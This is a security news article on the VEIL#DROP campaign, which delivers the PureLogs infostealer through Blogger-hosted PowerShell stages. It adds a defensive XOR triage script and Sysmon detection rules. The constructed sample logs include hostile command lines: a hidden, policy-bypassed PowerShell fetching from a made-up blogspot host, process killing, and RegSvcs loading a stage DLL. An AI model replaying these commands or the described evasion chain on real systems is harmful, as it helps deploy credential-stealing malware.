Security researchers have identified a malware distribution campaign that combines social engineering with Google's Blogger platform to deliver the PureLogs information stealer. Securonix, which tracks the operation as VEIL#DROP, assesses that initial access most likely comes through spear-phishing or drive-by compromise, catching users who visit malicious or compromised websites.
Complex Infection Chain
The chain begins with a JavaScript file disguised as a document. Windows Script Host executes it, and the script launches PowerShell with its execution policy bypassed. Researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee describe in their report how the script then quietly retrieves the next stage from a Blogger page. Hosting that stage on Google's infrastructure lets the attackers sidestep reputation-based filtering and blend into ordinary web traffic.
Once retrieved, the PowerShell payload opens benign websites such as Google as a decoy, giving the victim the appearance of normal activity while the malware silently proceeds to deploy PureLogs Stealer. This .NET-based infostealer is known for harvesting a wide range of sensitive information from compromised systems.
Evasive Techniques and Payload Execution
The PowerShell loader runs its follow-up commands without restriction, terminates processes such as wscript.exe to reduce forensic evidence, and erases traces of its initial execution. It also decrypts embedded payloads that are XOR-encoded. According to Securonix, this phase generates its stages dynamically rather than shipping fixed artifacts, so the malware avoids the static indicators and predictable patterns that detection signatures rely on.
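The XOR step above is where an analyst usually has to start: a blob is carved out of the script, the key is not obvious, and the question is whether the blob is the .NET stage. The following Python is an added triage helper, not code from the Securonix report or from the loader: it tries every single-byte XOR key, keeps the candidates that decode to something PE-shaped, and reports strings that hint at a managed assembly. The embedded sample blob is constructed for the demonstration and is not a real payload; a real one would be carved from the script by hand.

```python
"""XOR triage helper for payload blobs carved from a loader script.

Added example, not code from the Securonix report or from the loader itself:
given a blob whose XOR key is unknown, try every single-byte key and keep the
candidates that decode to something PE-shaped (MZ stub, e_lfanew pointing at
the PE signature), then look for strings that suggest a .NET assembly. The
sample blob at the bottom is constructed for the demo; it is not a real payload.
"""
import struct

# Strings that usually appear in a managed (.NET) PE image.
DOTNET_MARKERS = (b"mscoree.dll", b"_CorExeMain", b"_CorDllMain", b"BSJB")


def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key of any length (XOR is its own inverse)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE sanity check: MZ magic and a 'PE\\0\\0' signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if not 0x40 <= e_lfanew <= len(blob) - 4:
        return False
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def dotnet_hints(blob: bytes) -> list:
    """Return the .NET marker strings present in a decoded blob."""
    return [m.decode() for m in DOTNET_MARKERS if m in blob]


def brute_force_single_byte(data: bytes) -> list:
    """Try all 256 single-byte keys; return (key, decoded, hints) for PE-shaped results."""
    hits = []
    for k in range(256):
        dec = xor_decode(data, bytes([k]))
        if looks_like_pe(dec):
            hits.append((k, dec, dotnet_hints(dec)))
    return hits


def build_fake_pe() -> bytes:
    """Constructed stand-in for a .NET image: MZ header, e_lfanew=0x80, PE signature, CLR strings."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x80)         # e_lfanew
    hdr += b"\0" * (0x80 - len(hdr))                # DOS stub padding
    hdr += b"PE\0\0" + b"\0" * 20                   # PE signature + dummy COFF header
    hdr += b"mscoree.dll\0_CorExeMain\0" + b"\0" * 16
    return bytes(hdr)


# Constructed sample: the fake image XOR'd with a single-byte key the analyst does not know.
SAMPLE_KEY = 0x5A
ENCODED_SAMPLE = xor_decode(build_fake_pe(), bytes([SAMPLE_KEY]))

if __name__ == "__main__":
    for key, decoded, hints in brute_force_single_byte(ENCODED_SAMPLE):
        print(f"key=0x{key:02x} size={len(decoded)} dotnet_hints={hints}")
```

Single-byte keys are the cheap first pass; if nothing decodes, `xor_decode` already takes a multi-byte key, so the next step is to recover the key from the script itself rather than guess it. The PE check is deliberately loose: it accepts anything with a sane DOS header and PE signature, which is enough to separate a real candidate from 255 decoys.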
Each execution builds a unique blogspot URL that incorporates random elements, which defeats static URL signatures and URL filtering. The script also mutates itself at runtime, replacing placeholders with random values, so signature-based detection of the script body fails as well.
Advanced Evasion and Living-off-the-land Strategies
The script ultimately runs in memory without writing the payload to disk, acting as a loader for the main component, a .NET assembly. It uses reflective code loading so the assembly executes directly from memory, leaving few on-disk artifacts for antivirus to scan. If security controls block direct execution of the .NET assembly, the loader falls back to Microsoft-signed binaries such as regsvcs.exe and msbuild.exe to run it.
This living-off-the-land approach, which leans on trusted system binaries, lets attacker activity masquerade as legitimate processes. Notably, the loader does not depend on a single method; it follows a cascading execution model, trying each technique in turn until one succeeds.
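Every hop in the chain described on this page (WSH running a double-extension script, wscript.exe spawning PowerShell with the execution policy bypassed, PowerShell reaching a blogspot.com host, the loader killing wscript.exe, and the regsvcs.exe / msbuild.exe fallback) is visible in process-creation telemetry, which is where the cascading model actually works against the attacker: each fallback it tries is another parent/child pair to log. The Python below is an added example, not detection content from Securonix, running those rules over Sysmon-style process-creation records. The log lines are constructed for the demonstration; the field names follow Sysmon Event ID 1, but the paths, the blogspot hostname and the file names are made up.

```python
"""Process-creation detections for the chain described above.

Added example, not from the Securonix report: a few rules run over
Sysmon-style process-creation records (ParentImage, Image, CommandLine).
The log lines are constructed for the demo; field names follow Sysmon
Event ID 1, the paths, hostnames and file names are invented.
"""
import json
import re
from pathlib import PureWindowsPath

# Script "disguised as a document": document extension followed by a WSH extension.
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.(?:js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
# -ExecutionPolicy Bypass and its common abbreviations.
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+bypass", re.IGNORECASE)
# Match the domain suffix, not the full URL: the subdomain and path are randomised per run.
BLOGSPOT_RE = re.compile(r"https?://[^\s'\"]+\.blogspot\.com/", re.IGNORECASE)
WSCRIPT_RE = re.compile(r"\bwscript(?:\.exe)?\b", re.IGNORECASE)
DOTNET_LOLBINS = {"regsvcs.exe", "msbuild.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list:
    """Return the names of every rule the event trips (empty list if nothing matched)."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "wscript.exe" and DOUBLE_EXT_RE.search(cmd):
        hits.append("wsh_runs_double_extension_script")
    if parent == "wscript.exe" and image == "powershell.exe" and BYPASS_RE.search(cmd):
        hits.append("wsh_spawns_powershell_bypass")
    if image == "powershell.exe" and BLOGSPOT_RE.search(cmd):
        hits.append("powershell_fetches_blogspot")
    if parent == "powershell.exe" and image == "taskkill.exe" and WSCRIPT_RE.search(cmd):
        hits.append("loader_kills_wscript")
    if parent == "powershell.exe" and image in DOTNET_LOLBINS:
        hits.append("powershell_spawns_dotnet_lolbin")
    return hits


def scan(log_text: str) -> list:
    """Parse JSON lines; return [(record_index, [rule, ...]), ...] for records that matched."""
    findings = []
    records = [line for line in log_text.splitlines() if line.strip()]
    for idx, line in enumerate(records):
        hits = classify(json.loads(line))
        if hits:
            findings.append((idx, hits))
    return findings


def stages_observed(findings: list) -> set:
    """Distinct rules seen; several distinct stages on one host is the strong signal."""
    return {rule for _, hits in findings for rule in hits}


# Constructed sample telemetry: four records from the chain, two benign look-alikes.
SAMPLE_LOG = r"""
{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\wscript.exe","CommandLine":"wscript.exe \"C:\\Users\\u\\Downloads\\Invoice_2024.pdf.js\""}
{"ParentImage":"C:\\Windows\\System32\\wscript.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command \"iwr https://sample-7f3a9c.blogspot.com/p/page.html\""}
{"ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\System32\\taskkill.exe","CommandLine":"taskkill /F /IM wscript.exe"}
{"ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","CommandLine":"RegSvcs.exe C:\\Users\\u\\AppData\\Local\\Temp\\stage.dll"}
{"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -Command Get-Process"}
{"ParentImage":"C:\\Program Files\\Microsoft Visual Studio\\devenv.exe","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe","CommandLine":"MSBuild.exe proj.csproj"}
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for idx, hits in found:
        print(f"record {idx}: {', '.join(hits)}")
    print(f"distinct stages on host: {len(stages_observed(found))}")
```

Two design points follow from the page. Because the blogspot URL is randomised per execution, the rule keys on the `.blogspot.com/` suffix rather than any full URL, and because the loader cascades through execution methods, the parent/child rules are kept separate so that each attempted fallback is its own finding; correlating several distinct stages on one host in a short window is what lifts this from noisy single hits to a confident alert. The benign records (an interactive PowerShell session and MSBuild launched from Visual Studio) trip nothing.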
Implications for Cybersecurity
An infection by PureLogs Stealer can have consequences well beyond the initially compromised system. The harvested data can enable deeper penetration into the target's infrastructure, letting adversaries establish persistence, move laterally, and potentially compromise cloud services. As Securonix observes, the combination of fileless execution, trusted-service abuse, and the other evasion techniques described above shows a calculated effort to evade traditional antivirus and to minimize forensic evidence throughout the malware's lifecycle.
